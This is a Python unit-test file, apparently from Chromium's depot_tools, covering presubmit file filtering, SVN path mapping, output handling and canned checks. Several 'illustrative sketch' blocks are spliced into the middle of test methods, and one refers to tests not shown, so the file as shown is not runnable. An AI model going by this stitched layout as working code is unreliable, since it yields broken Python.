testMembersChanged(self): self.mox.ReplayAll() members = [ 'AbsoluteLocalPaths', 'AffectedFiles', 'AffectedSourceFiles', 'AffectedTextFiles', 'DEFAULT_BLACK_LIST', 'DEFAULT_WHITE_LIST', 'DepotToLocalPath', 'FilterSourceFile', 'LocalPaths', 'LocalToDepotPath', 'Command', 'RunTests', 'PresubmitLocalPath', 'ReadFile', 'RightHandSideLines', 'ServerPaths', 'basename', 'cPickle', 'cpplint', 'cStringIO', 'canned_checks', 'change', 'cpu_count', 'environ', 'glob', 'host_url', 'is_committing', 'json', 'logging', 'marshal', 'os_listdir', 'os_walk', 'os_path', 'os_stat', 'owners_db', 'pickle', 'platform', 'python_executable', 're', 'rietveld', 'subprocess', 'tbr', 'tempfile', 'time', 'traceback', 'unittest', 'urllib2', 'version', 'verbose', ] # If this test fails, you should add the relevant test. 
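# -----------------------------------------------------------------------------
# Illustrative sketch, not part of the original test suite and not the real
# presubmit._MergeMasters: one plausible way to union the nested
# {master: {builder: set(tests)}} mappings that testMergeMasters and
# testDoGetTryMasters above exercise.  The helper name is hypothetical.
def _example_merge_masters(lhs, rhs):
  """Union two {master: {builder: set(tests)}} mappings without mutating."""
  merged = {}
  for source in (lhs, rhs):
    for master, builders in source.items():
      master_entry = merged.setdefault(master, {})
      for builder, tests in builders.items():
        master_entry.setdefault(builder, set()).update(tests)
  return merged

assert _example_merge_masters(
    {'try1.cr': {'win': set(['defaulttests'])}},
    {'try1.cr': {'linux1': set(['test1'])}}) == {
        'try1.cr': {'win': set(['defaulttests']), 'linux1': set(['test1'])}}
# -----------------------------------------------------------------------------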
self.compareMembers( presubmit.InputApi(self.fake_change, './.', False, None, False), members) def testDepotToLocalPath(self): presubmit.scm.SVN._CaptureInfo(['svn://foo/smurf'], self.fake_root_dir ).AndReturn({'Path': 'prout'}) presubmit.scm.SVN._CaptureInfo( ['svn:/foo/notfound/burp'], self.fake_root_dir ).AndReturn({}) self.mox.ReplayAll() path = presubmit.InputApi( self.fake_change, './p', False, None, False).DepotToLocalPath( 'svn://foo/smurf') self.failUnless(path == 'prout') path = presubmit.InputApi( self.fake_change, './p', False, None, False).DepotToLocalPath( 'svn:/foo/notfound/burp') self.failUnless(path == None) def testLocalToDepotPath(self): presubmit.scm.SVN._CaptureInfo(['smurf'], self.fake_root_dir ).AndReturn({'URL': 'svn://foo'}) presubmit.scm.SVN._CaptureInfo(['notfound-food'], self.fake_root_dir ).AndReturn({}) self.mox.ReplayAll() path = presubmit.InputApi( self.fake_change, './p', False, None, False).LocalToDepotPath( 'smurf') self.assertEqual(path, 'svn://foo') path = presubmit.InputApi( self.fake_change, './p', False, None, False).LocalToDepotPath( 'notfound-food') self.assertEquals(path, None) def testInputApiConstruction(self): self.mox.ReplayAll() api = presubmit.InputApi( self.fake_change, presubmit_path='foo/path/PRESUBMIT.py', is_committing=False, rietveld_obj=None, verbose=False) self.assertEquals(api.PresubmitLocalPath(), 'foo/path') self.assertEquals(api.change, self.fake_change) self.assertEquals(api.host_url, 'http://codereview.chromium.org') def testInputApiPresubmitScriptFiltering(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'BUG=123', ' STORY =http://foo/ \t', 'and some more regular text') files = [ ['A', join('foo', 'blat.cc')], ['M', join('foo', 'blat', 'READ_ME2')], ['M', join('foo', 'blat', 'binary.dll')], ['M', join('foo', 'blat', 'weird.xyz')], ['M', join('foo', 'blat', 'another.h')], ['M', join('foo', 'third_party', 'third.cc')], ['D', join('foo', 'mat', 'beingdeleted.txt')], ['M', join('flop', 'notfound.txt')], ['A', join('boo', 'flap.h')], ] blat = presubmit.normpath(join(self.fake_root_dir, files[0][1])) readme = presubmit.normpath(join(self.fake_root_dir, files[1][1])) binary = presubmit.normpath(join(self.fake_root_dir, files[2][1])) weird = presubmit.normpath(join(self.fake_root_dir, files[3][1])) another = presubmit.normpath(join(self.fake_root_dir, files[4][1])) third_party = presubmit.normpath(join(self.fake_root_dir, files[5][1])) beingdeleted = presubmit.normpath(join(self.fake_root_dir, files[6][1])) notfound = presubmit.normpath(join(self.fake_root_dir, files[7][1])) flap = presubmit.normpath(join(self.fake_root_dir, files[8][1])) for i in (blat, readme, binary, weird, another, third_party): presubmit.os.path.exists(i).AndReturn(True) presubmit.os.path.isdir(i).AndReturn(False) presubmit.os.path.exists(beingdeleted).AndReturn(False) presubmit.os.path.exists(notfound).AndReturn(False) presubmit.os.path.exists(flap).AndReturn(True) presubmit.os.path.isdir(flap).AndReturn(False) presubmit.scm.SVN._CaptureInfo( [files[6][1]], self.fake_root_dir).AndReturn({}) presubmit.scm.SVN._CaptureInfo( [files[7][1]], self.fake_root_dir).AndReturn({}) presubmit.scm.SVN.GetFileProperty( files[0][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[1][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[2][1], 'svn:mime-type', self.fake_root_dir ).AndReturn('application/octet-stream') 
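# -----------------------------------------------------------------------------
# Illustrative sketch, not the real presubmit.Change tag parser: roughly how
# KEY=value lines such as 'BUG=123' or ' STORY =http://foo/' in the change
# descriptions used above (testTags, testInputApiPresubmitScriptFiltering) can
# be split into tags.  The regexp and helper name below are assumptions.
import re

_EXAMPLE_TAG_LINE_RE = re.compile(
    r'^\s*(?P<key>[A-Z][A-Z_0-9]*)\s*=\s*(?P<value>.*?)\s*$')

def _example_parse_tags(description):
  """Return {tag: value} for description lines that look like KEY=value."""
  tags = {}
  for line in description.splitlines():
    match = _EXAMPLE_TAG_LINE_RE.match(line)
    if match:
      tags[match.group('key')] = match.group('value')
  return tags

assert _example_parse_tags(
    'Hello there\nBUG=123\n STORY =http://foo/ \t') == {
        'BUG': '123', 'STORY': 'http://foo/'}
# -----------------------------------------------------------------------------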
presubmit.scm.SVN.GetFileProperty( files[3][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[4][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[5][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GenerateDiff( [files[0][1]], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) presubmit.scm.SVN.GenerateDiff( [files[4][1]], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) input_api = presubmit.InputApi( change, join(self.fake_root_dir, 'foo', 'PRESUBMIT.py'), False, None, False) # Doesn't filter much got_files = input_api.AffectedFiles() self.assertEquals(len(got_files), 7) self.assertEquals(got_files[0].LocalPath(), presubmit.normpath(files[0][1])) self.assertEquals(got_files[1].LocalPath(), presubmit.normpath(files[1][1])) self.assertEquals(got_files[2].LocalPath(), presubmit.normpath(files[2][1])) self.assertEquals(got_files[3].LocalPath(), presubmit.normpath(files[3][1])) self.assertEquals(got_files[4].LocalPath(), presubmit.normpath(files[4][1])) self.assertEquals(got_files[5].LocalPath(), presubmit.normpath(files[5][1])) self.assertEquals(got_files[6].LocalPath(), presubmit.normpath(files[6][1])) # Ignores weird because of whitelist, third_party because of blacklist, # binary isn't a text file and beingdeleted doesn't exist. The rest is # outside foo/. rhs_lines = [x for x in input_api.RightHandSideLines(None)] self.assertEquals(len(rhs_lines), 14) self.assertEqual(rhs_lines[0][0].LocalPath(), presubmit.normpath(files[0][1])) self.assertEqual(rhs_lines[3][0].LocalPath(), presubmit.normpath(files[0][1])) self.assertEqual(rhs_lines[7][0].LocalPath(), presubmit.normpath(files[4][1])) self.assertEqual(rhs_lines[13][0].LocalPath(), presubmit.normpath(files[4][1])) def testDefaultWhiteListBlackListFilters(self): def f(x): return presubmit.AffectedFile(x, 'M', self.fake_root_dir, None) files = [ ( [ # To be tested. f('testing_support/google_appengine/b'), f('testing_support/not_google_appengine/foo.cc'), ], [ # Expected. 'testing_support/not_google_appengine/foo.cc', ], ), ( [ # To be tested. f('a/experimental/b'), f('experimental/b'), f('a/experimental'), f('a/experimental.cc'), f('a/experimental.S'), ], [ # Expected. 'a/experimental.cc', 'a/experimental.S', ], ), ( [ # To be tested. f('a/third_party/b'), f('third_party/b'), f('a/third_party'), f('a/third_party.cc'), ], [ # Expected. 'a/third_party.cc', ], ), ( [ # To be tested. f('a/LOL_FILE/b'), f('b.c/LOL_FILE'), f('a/PRESUBMIT.py'), f('a/FOO.json'), f('a/FOO.java'), ], [ # Expected. 'a/PRESUBMIT.py', 'a/FOO.java', ], ), ( [ # To be tested. f('a/.git'), f('b.c/.git'), f('a/.git/bleh.py'), f('.git/bleh.py'), f('bleh.diff'), f('foo/bleh.patch'), ], [ # Expected. ], ), ] input_api = presubmit.InputApi( self.fake_change, './PRESUBMIT.py', False, None, False) self.mox.ReplayAll() self.assertEqual(len(input_api.DEFAULT_WHITE_LIST), 22) self.assertEqual(len(input_api.DEFAULT_BLACK_LIST), 12) for item in files: results = filter(input_api.FilterSourceFile, item[0]) for i in range(len(results)): self.assertEquals(results[i].LocalPath(), presubmit.normpath(item[1][i])) # Same number of expected results. 
self.assertEquals(sorted([f.LocalPath().replace(presubmit.os.sep, '/') for f in results]), sorted(item[1])) def testCustomFilter(self): def FilterSourceFile(affected_file): return 'a' in affected_file.LocalPath() files = [('A', 'eeaee'), ('M', 'eeabee'), ('M', 'eebcee')] for _, item in files: full_item = presubmit.os.path.join(self.fake_root_dir, item) presubmit.os.path.exists(full_item).AndReturn(True) presubmit.os.path.isdir(full_item).AndReturn(False) presubmit.scm.SVN.GetFileProperty( item, 'svn:mime-type', self.fake_root_dir).AndReturn(None) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, files, 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, 'PRESUBMIT.py'), False, None, False) got_files = input_api.AffectedSourceFiles(FilterSourceFile) self.assertEquals(len(got_files), 2) self.assertEquals(got_files[0].LocalPath(), 'eeaee') self.assertEquals(got_files[1].LocalPath(), 'eeabee') def testLambdaFilter(self): white_list = presubmit.InputApi.DEFAULT_BLACK_LIST + (r".*?a.*?",) black_list = [r".*?b.*?"] files = [('A', 'eeaee'), ('M', 'eeabee'), ('M', 'eebcee'), ('M', 'eecaee')] for _, item in files: full_item = presubmit.os.path.join(self.fake_root_dir, item) presubmit.os.path.exists(full_item).AndReturn(True) presubmit.os.path.isdir(full_item).AndReturn(False) presubmit.scm.SVN.GetFileProperty( item, 'svn:mime-type', self.fake_root_dir).AndReturn(None) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, files, 0, 0, None) input_api = presubmit.InputApi( change, './PRESUBMIT.py', False, None, False) # Sample usage of overiding the default white and black lists. got_files = input_api.AffectedSourceFiles( lambda x: input_api.FilterSourceFile(x, white_list, black_list)) self.assertEquals(len(got_files), 2) self.assertEquals(got_files[0].LocalPath(), 'eeaee') self.assertEquals(got_files[1].LocalPath(), 'eecaee') def testGetAbsoluteLocalPath(self): join = presubmit.os.path.join normpath = presubmit.normpath # Regression test for bug of presubmit stuff that relies on invoking # SVN (e.g. to get mime type of file) not working unless gcl invoked # from the client root (e.g. if you were at 'src' and did 'cd base' before # invoking 'gcl upload' it would fail because svn wouldn't find the files # the presubmit script was asking about). 
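# -----------------------------------------------------------------------------
# Illustrative sketch, not the real InputApi.FilterSourceFile: the general
# shape of the white-list/black-list regexp filtering exercised above by
# testDefaultWhiteListBlackListFilters and testLambdaFilter.  A file is kept
# when it matches at least one white-list regexp and no black-list regexp.
# The helper name and the tiny default lists are made up for illustration.
import re

def _example_filter_source_file(local_path,
                                white_list=(r'.+\.py$', r'.+\.cc$'),
                                black_list=(r'.*third_party[\\/].*',)):
  """Return True if local_path passes the white/black list regexps."""
  def _matches(regexps):
    return any(re.match(pattern, local_path) for pattern in regexps)
  return _matches(white_list) and not _matches(black_list)

assert _example_filter_source_file('a/foo.cc')
assert not _example_filter_source_file('a/third_party/foo.cc')
assert not _example_filter_source_file('a/foo.png')
# -----------------------------------------------------------------------------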
files = [ ['A', 'isdir'], ['A', join('isdir', 'blat.cc')], ['M', join('elsewhere', 'ouf.cc')], ] self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, files, 0, 0, None) affected_files = change.AffectedFiles(include_dirs=True) # Local paths should remain the same self.assertEquals(affected_files[0].LocalPath(), normpath('isdir')) self.assertEquals(affected_files[1].LocalPath(), normpath('isdir/blat.cc')) # Absolute paths should be prefixed self.assertEquals(affected_files[0].AbsoluteLocalPath(), normpath(join(self.fake_root_dir, 'isdir'))) self.assertEquals(affected_files[1].AbsoluteLocalPath(), normpath(join(self.fake_root_dir, 'isdir/blat.cc'))) # New helper functions need to work paths_from_change = change.AbsoluteLocalPaths(include_dirs=True) self.assertEqual(len(paths_from_change), 3) presubmit_path = join(self.fake_root_dir, 'isdir', 'PRESUBMIT.py') api = presubmit.InputApi( change=change, presubmit_path=presubmit_path, is_committing=True, rietveld_obj=None, verbose=False) paths_from_api = api.AbsoluteLocalPaths(include_dirs=True) self.assertEqual(len(paths_from_api), 2) for absolute_paths in [paths_from_change, paths_from_api]: self.assertEqual(absolute_paths[0], normpath(join(self.fake_root_dir, 'isdir'))) self.assertEqual(absolute_paths[1], normpath(join(self.fake_root_dir, 'isdir', 'blat.cc'))) def testDeprecated(self): presubmit.warn(mox.IgnoreArg(), category=mox.IgnoreArg(), stacklevel=2) self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, [], 0, 0, None) api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, 'foo', 'PRESUBMIT.py'), True, None, False) api.AffectedTextFiles(include_deletes=False) def testReadFileStringDenied(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) self.assertRaises(IOError, input_api.ReadFile, 'boo', 'x') def testReadFileStringAccepted(self): path = presubmit.os.path.join(self.fake_root_dir, 'AA/boo') presubmit.gclient_utils.FileRead(path, 'x').AndReturn(None) self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) input_api.ReadFile(path, 'x') def testReadFileAffectedFileDenied(self): fileobj = presubmit.AffectedFile('boo', 'M', 'Unrelated', diff_cache=mox.IsA(presubmit._DiffCache)) self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) self.assertRaises(IOError, input_api.ReadFile, fileobj, 'x') def testReadFileAffectedFileAccepted(self): fileobj = presubmit.AffectedFile('AA/boo', 'M', self.fake_root_dir, diff_cache=mox.IsA(presubmit._DiffCache)) presubmit.gclient_utils.FileRead(fileobj.AbsoluteLocalPath(), 'x' ).AndReturn(None) self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) input_api.ReadFile(fileobj, 'x') class OutputApiUnittest(PresubmitTestsBase): """Tests presubmit.OutputApi.""" def testMembersChanged(self): self.mox.ReplayAll() members = [ 'MailTextResult', 'PresubmitAddReviewers', 'PresubmitError', 
'PresubmitNotifyResult', 'PresubmitPromptWarning', 'PresubmitPromptOrNotify', 'PresubmitResult', 'is_committing', ] # If this test fails, you should add the relevant test. self.compareMembers(presubmit.OutputApi(False), members) def testOutputApiBasics(self): self.mox.ReplayAll() self.failUnless(presubmit.OutputApi.PresubmitError('').fatal) self.failIf(presubmit.OutputApi.PresubmitError('').should_prompt) self.failIf(presubmit.OutputApi.PresubmitPromptWarning('').fatal) self.failUnless( presubmit.OutputApi.PresubmitPromptWarning('').should_prompt) self.failIf(presubmit.OutputApi.PresubmitNotifyResult('').fatal) self.failIf(presubmit.OutputApi.PresubmitNotifyResult('').should_prompt) self.failIf(presubmit.OutputApi.PresubmitAddReviewers( ['foo']).fatal) self.failIf(presubmit.OutputApi.PresubmitAddReviewers( ['foo']).should_prompt) # TODO(joi) Test MailTextResult once implemented. def testOutputApiHandling(self): self.mox.ReplayAll() output = presubmit.PresubmitOutput() presubmit.OutputApi.PresubmitAddReviewers( ['[email protected]']).handle(output) self.failUnless(output.should_continue()) self.failUnlessEqual(output.reviewers, ['[email protected]']) output = presubmit.PresubmitOutput() presubmit.OutputApi.PresubmitError('!!!').handle(output) self.failIf(output.should_continue()) self.failUnless(output.getvalue().count('!!!')) output = presubmit.PresubmitOutput() presubmit.OutputApi.PresubmitNotifyResult('?see?').handle(output) self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('?see?')) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('y')) presubmit.OutputApi.PresubmitPromptWarning('???').handle(output) output.prompt_yes_no('prompt: ') self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('???')) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('\n')) presubmit.OutputApi.PresubmitPromptWarning('???').handle(output) output.prompt_yes_no('prompt: ') self.failIf(output.should_continue()) self.failUnless(output.getvalue().count('???')) output_api = presubmit.OutputApi(True) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('y')) output_api.PresubmitPromptOrNotify('???').handle(output) output.prompt_yes_no('prompt: ') self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('???')) output_api = presubmit.OutputApi(False) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('y')) output_api.PresubmitPromptOrNotify('???').handle(output) self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('???')) output_api = presubmit.OutputApi(True) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('\n')) output_api.PresubmitPromptOrNotify('???').handle(output) output.prompt_yes_no('prompt: ') self.failIf(output.should_continue()) self.failUnless(output.getvalue().count('???')) class AffectedFileUnittest(PresubmitTestsBase): def testMembersChanged(self): self.mox.ReplayAll() members = [ 'AbsoluteLocalPath', 'Action', 'ChangedContents', 'DIFF_CACHE', 'GenerateScmDiff', 'IsDirectory', 'IsTextFile', 'LocalPath', 'NewContents', 'Property', 'ServerPath', ] # If this test fails, you should add the relevant test. 
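# -----------------------------------------------------------------------------
# Illustrative sketch, not the real presubmit.OutputApi / PresubmitOutput: the
# fatal/should_prompt semantics asserted on by testOutputApiBasics and
# testOutputApiHandling above.  An error always blocks, a prompt warning only
# blocks when the user answers "no", and a notify never blocks.  All names
# here are assumptions made for illustration.
class _ExampleResult(object):
  fatal = False
  should_prompt = False

  def __init__(self, message):
    self.message = message

class _ExampleError(_ExampleResult):
  fatal = True

class _ExamplePromptWarning(_ExampleResult):
  should_prompt = True

def _example_should_continue(results, answer_yes):
  """True if there is no fatal result and every prompt was answered yes."""
  for result in results:
    if result.fatal:
      return False
    if result.should_prompt and not answer_yes:
      return False
  return True

assert _example_should_continue([_ExampleResult('fyi')], answer_yes=False)
assert not _example_should_continue([_ExampleError('boom')], answer_yes=True)
assert _example_should_continue([_ExamplePromptWarning('?')], answer_yes=True)
# -----------------------------------------------------------------------------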
    self.compareMembers(
        presubmit.AffectedFile('a', 'b', self.fake_root_dir, None), members)
    self.compareMembers(
        presubmit.SvnAffectedFile('a', 'b', self.fake_root_dir, None), members)
    self.compareMembers(
        presubmit.GitAffectedFile('a', 'b', self.fake_root_dir, None), members)

  def testAffectedFile(self):
    path = presubmit.os.path.join('foo', 'blat.cc')
    f_path = presubmit.os.path.join(self.fake_root_dir, path)
    presubmit.os.path.exists(f_path).AndReturn(True)
    presubmit.os.path.isdir(f_path).AndReturn(False)
    presubmit.gclient_utils.FileRead(f_path, 'rU').AndReturn('whatever\ncookie')
    presubmit.scm.SVN._CaptureInfo([path], self.fake_root_dir).AndReturn(
        {'URL': 'svn:/foo/foo/blat.cc'})
    self.mox.ReplayAll()
    af = presubmit.SvnAffectedFile('foo/blat.cc', 'M', self.fake_root_dir, None)
    self.assertEquals('svn:/foo/foo/blat.cc', af.ServerPath())
    self.assertEquals(presubmit.normpath('foo/blat.cc'), af.LocalPath())
    self.assertEquals('M', af.Action())
    self.assertEquals(['whatever', 'cookie'], af.NewContents())

  def testAffectedFileNotExists(self):
    notfound = 'notfound.cc'
    f_notfound = presubmit.os.path.join(self.fake_root_dir, notfound)
    presubmit.os.path.exists(f_notfound).AndReturn(False)
    presubmit.gclient_utils.FileRead(f_notfound, 'rU').AndRaise(IOError)
    self.mox.ReplayAll()
    af = presubmit.AffectedFile(notfound, 'A', self.fake_root_dir, None)
    self.assertEquals('', af.ServerPath())
    self.assertEquals([], af.NewContents())

  def testProperty(self):
    presubmit.scm.SVN.GetFileProperty(
        'foo.cc', 'svn:secret-property', self.fake_root_dir
        ).AndReturn('secret-property-value')
    self.mox.ReplayAll()
    affected_file = presubmit.SvnAffectedFile(
        'foo.cc', 'A', self.fake_root_dir, None)
    # Verify cache coherency.
    self.assertEquals('secret-property-value',
                      affected_file.Property('svn:secret-property'))
    self.assertEquals('secret-property-value',
                      affected_file.Property('svn:secret-property'))

  def testIsDirectoryNotExists(self):
    filename = 'foo.cc'
    f_filename = presubmit.os.path.join(self.fake_root_dir, filename)
    presubmit.os.path.exists(f_filename).AndReturn(False)
    presubmit.scm.SVN._CaptureInfo([filename], self.fake_root_dir).AndReturn({})
    self.mox.ReplayAll()
    affected_file = presubmit.SvnAffectedFile(
        filename, 'A', self.fake_root_dir, None)
    # Verify cache coherency.
    self.failIf(affected_file.IsDirectory())
    self.failIf(affected_file.IsDirectory())

  def testIsDirectory(self):
    filename = 'foo.cc'
    f_filename = presubmit.os.path.join(self.fake_root_dir, filename)
    presubmit.os.path.exists(f_filename).AndReturn(True)
    presubmit.os.path.isdir(f_filename).AndReturn(True)
    self.mox.ReplayAll()
    affected_file = presubmit.SvnAffectedFile(
        filename, 'A', self.fake_root_dir, None)
    # Verify cache coherency.
self.failUnless(affected_file.IsDirectory()) self.failUnless(affected_file.IsDirectory()) def testIsTextFile(self): files = [ presubmit.SvnAffectedFile('foo/blat.txt', 'M', self.fake_root_dir, None), presubmit.SvnAffectedFile('foo/binary.blob', 'M', self.fake_root_dir, None), presubmit.SvnAffectedFile('blat/flop.txt', 'D', self.fake_root_dir, None) ] blat = presubmit.os.path.join('foo', 'blat.txt') blob = presubmit.os.path.join('foo', 'binary.blob') f_blat = presubmit.os.path.join(self.fake_root_dir, blat) f_blob = presubmit.os.path.join(self.fake_root_dir, blob) presubmit.os.path.exists(f_blat).AndReturn(True) presubmit.os.path.isdir(f_blat).AndReturn(False) presubmit.os.path.exists(f_blob).AndReturn(True) presubmit.os.path.isdir(f_blob).AndReturn(False) presubmit.scm.SVN.GetFileProperty(blat, 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty(blob, 'svn:mime-type', self.fake_root_dir ).AndReturn('application/octet-stream') self.mox.ReplayAll() output = filter(lambda x: x.IsTextFile(), files) self.assertEquals(1, len(output)) self.assertEquals(files[0], output[0]) class ChangeUnittest(PresubmitTestsBase): def testMembersChanged(self): members = [ 'AbsoluteLocalPaths', 'AffectedFiles', 'AffectedTextFiles', 'AllFiles', 'DescriptionText', 'FullDescriptionText', 'LocalPaths', 'Name', 'RepositoryRoot', 'RightHandSideLines', 'ServerPaths', 'SetDescriptionText', 'TAG_LINE_RE', 'author_email', 'issue', 'patchset', 'scm', 'tags', ] # If this test fails, you should add the relevant test. self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, 'foo') self.compareMembers(change, members) def testMembers(self): change = presubmit.Change( 'foo1', 'foo2\nDRU=ro', self.fake_root_dir, [('Y', 'AA')], 3, 5, 'foo3') self.assertEquals('foo1', change.Name()) self.assertEquals('foo2', change.DescriptionText()) self.assertEquals('foo3', change.author_email) self.assertEquals('ro', change.DRU) self.assertEquals(3, change.issue) self.assertEquals(5, change.patchset) self.assertEquals(self.fake_root_dir, change.RepositoryRoot()) self.assertEquals(1, len(change.AffectedFiles(include_dirs=True))) self.assertEquals('Y', change.AffectedFiles(include_dirs=True)[0].Action()) def testSetDescriptionText(self): change = presubmit.Change( '', 'foo\nDRU=ro', self.fake_root_dir, [], 3, 5, '') self.assertEquals('foo', change.DescriptionText()) self.assertEquals('foo\nDRU=ro', change.FullDescriptionText()) self.assertEquals('ro', change.DRU) change.SetDescriptionText('bar\nWHIZ=bang') self.assertEquals('bar', change.DescriptionText()) self.assertEquals('bar\nWHIZ=bang', change.FullDescriptionText()) self.assertEquals('bang', change.WHIZ) self.assertFalse(change.DRU) def CommHelper(input_api, cmd, ret=None, **kwargs): ret = ret or (('', None), 0) input_api.subprocess.communicate( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs ).AndReturn(ret) class CannedChecksUnittest(PresubmitTestsBase): """Tests presubmit_canned_checks.py.""" def MockInputApi(self, change, committing): # pylint: disable=R0201 input_api = self.mox.CreateMock(presubmit.InputApi) input_api.cStringIO = presubmit.cStringIO input_api.json = presubmit.json input_api.logging = logging input_api.os_listdir = self.mox.CreateMockAnything() input_api.os_walk = self.mox.CreateMockAnything() input_api.os_path = presubmit.os.path input_api.re = presubmit.re input_api.rietveld = self.mox.CreateMock(rietveld.Rietveld) input_api.traceback = presubmit.traceback input_api.urllib2 
= self.mox.CreateMock(presubmit.urllib2) input_api.unittest = unittest input_api.subprocess = self.mox.CreateMock(subprocess) presubmit.subprocess = input_api.subprocess class fake_CalledProcessError(Exception): def __str__(self): return 'foo' input_api.subprocess.CalledProcessError = fake_CalledProcessError input_api.verbose = False input_api.change = change input_api.host_url = 'http://localhost' input_api.is_committing = committing input_api.tbr = False input_api.python_executable = 'pyyyyython' input_api.platform = sys.platform input_api.cpu_count = 2 input_api.time = time input_api.canned_checks = presubmit_canned_checks input_api.Command = presubmit.CommandData input_api.RunTests = functools.partial( presubmit.InputApi.RunTests, input_api) return input_api def testMembersChanged(self): self.mox.ReplayAll() members = [ 'DEFAULT_LINT_FILTERS', 'CheckBuildbotPendingBuilds', 'CheckChangeHasBugField', 'CheckChangeHasDescription', 'CheckChangeHasNoStrayWhitespace', 'CheckChangeHasOnlyOneEol', 'CheckChangeHasNoCR', 'CheckChangeHasNoCrAndHasOnlyOneEol', 'CheckChangeHasNoTabs', 'CheckChangeTodoHasOwner', 'CheckChangeHasQaField', 'CheckChangeHasTestedField', 'CheckChangeHasTestField', 'CheckChangeLintsClean', 'CheckChangeSvnEolStyle', 'CheckChangeWasUploaded', 'CheckDoNotSubmit', 'CheckDoNotSubmitInDescription', 'CheckDoNotSubmitInFiles', 'CheckLongLines', 'CheckTreeIsOpen', 'PanProjectChecks', 'CheckLicense', 'CheckOwners', 'CheckPatchFormatted', 'CheckGNFormatted', 'CheckRietveldTryJobExecution', 'CheckSingletonInHeaders', 'CheckSvnModifiedDirectories', 'CheckSvnForCommonMimeTypes', 'CheckSvnProperty', 'RunPythonUnitTests', 'RunPylint', 'RunUnitTests', 'RunUnitTestsInDirectory', 'GetPythonUnitTests', 'GetPylint', 'GetUnitTests', 'GetUnitTestsInDirectory', 'GetUnitTestsRecursively', ] # If this test fails, you should add the relevant test. self.compareMembers(presubmit_canned_checks, members) def DescriptionTest(self, check, description1, description2, error_type, committing): change1 = presubmit.Change( 'foo1', description1, self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, committing) change2 = presubmit.Change( 'foo2', description2, self.fake_root_dir, None, 0, 0, None) input_api2 = self.MockInputApi(change2, committing) self.mox.ReplayAll() results1 = check(input_api1, presubmit.OutputApi) self.assertEquals(results1, []) results2 = check(input_api2, presubmit.OutputApi) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def ContentTest(self, check, content1, content1_path, content2, content2_path, error_type): """Runs a test of a content-checking rule. Args: check: the check to run. content1: content which is expected to pass the check. content1_path: file path for content1. content2: content which is expected to fail the check. content2_path: file path for content2. error_type: the type of the error expected for content2. 
""" change1 = presubmit.Change( 'foo1', 'foo1\n', self.fake_root_dir, None, 0, 0, None) input_api1 = self.MockInputApi(change1, False) affected_file = self.mox.CreateMock(presubmit.SvnAffectedFile) input_api1.AffectedFiles( include_deletes=False, file_filter=mox.IgnoreArg()).AndReturn([affected_file]) affected_file.LocalPath().AndReturn(content1_path) affected_file.NewContents().AndReturn([ 'afoo', content1, 'bfoo', 'cfoo', 'dfoo']) change2 = presubmit.Change( 'foo2', 'foo2\n', self.fake_root_dir, None, 0, 0, None) input_api2 = self.MockInputApi(change2, False) input_api2.AffectedFiles( include_deletes=False, file_filter=mox.IgnoreArg()).AndReturn([affected_file]) affected_file.LocalPath().AndReturn(content2_path) affected_file.NewContents().AndReturn([ 'dfoo', content2, 'efoo', 'ffoo', 'gfoo']) # It falls back to ChangedContents when there is a failure. This is an # optimization since NewContents() is much faster to execute than # ChangedContents(). affected_file.ChangedContents().AndReturn([ (42, content2), (43, 'hfoo'), (23, 'ifoo')]) affected_file.LocalPath().AndReturn('foo.cc') self.mox.ReplayAll() results1 = check(input_api1, presubmit.OutputApi, None) self.assertEquals(results1, []) results2 = check(input_api2, presubmit.OutputApi, None) self.assertEquals(len(results2), 1) self.assertEquals(results2[0].__class__, error_type) def ReadFileTest(self, check, content1, content2, error_type): change1 = presubmit.Change( 'foo1', 'foo1\n', self.fake_root_dir, 